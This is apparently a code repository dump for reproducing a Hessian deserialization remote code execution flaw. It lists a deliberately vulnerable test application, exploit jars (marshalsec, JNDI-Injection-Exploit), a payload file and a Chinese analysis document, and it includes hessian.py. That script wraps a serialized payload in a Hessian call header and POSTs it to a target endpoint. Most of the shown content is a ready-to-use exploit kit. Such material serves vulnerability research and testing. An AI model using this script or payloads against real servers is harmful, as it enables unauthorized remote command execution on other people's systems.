├── HessianTest.war
├── Hessian反序列化RCE复现及分析.doc
├── JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
├── README.md
├── hessian.py
├── hession
└── marshalsec-0.0.3-SNAPSHOT-all.jar


/HessianTest.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/HessianTest.war


--------------------------------------------------------------------------------
/Hessian反序列化RCE复现及分析.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/Hessian反序列化RCE复现及分析.doc


--------------------------------------------------------------------------------
/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Hessian-Deserialize-RCE
2 | Hession-Deserialize-RCE 反序列化命令执行
3 | 


--------------------------------------------------------------------------------
/hessian.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # coding=utf-8
 3 | # code by 21superman
 4 | # Date 2018年12月28日
 5 | import requests
 6 | import argparse
 7 | 
 8 | def load(name):
 9 |     header=b'\x63\x02\x00\x48\x00\x04'+'test'
10 |     with open(name,'rb') as f:
11 |         return header+f.read()
12 | 
13 | def send(url,payload):
14 |     #proxies = {'http':'127.0.0.1:8888'}
15 |     headers={'Content-Type':'x-application/hessian'}
16 |     data=payload
17 |     res=requests.post(url,headers=headers,data=data)
18 |     return res.text
19 | 
20 | def main():
21 |     parser = argparse.ArgumentParser()
22 |     parser.add_argument("-u", help="hessian site url eg.http://127.0.0.1:8080/HessianTest/hessian")
23 |     parser.add_argument("-p",help="payload file")
24 |     args = parser.parse_args()
25 |     if args.u==None or args.p==None:
26 |         print('eg. python hessian.py -u http://127.0.0.1:8080/HessianTest/hessian -p hessian')
27 |     else:
28 |         send(args.u, load(args.p))
29 | if __name__ == '__main__':
30 |     main()
31 |     #load('hessian')
32 | 
33 | 


--------------------------------------------------------------------------------
/hession:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/hession


--------------------------------------------------------------------------------
/marshalsec-0.0.3-SNAPSHOT-all.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/marshalsec-0.0.3-SNAPSHOT-all.jar


--------------------------------------------------------------------------------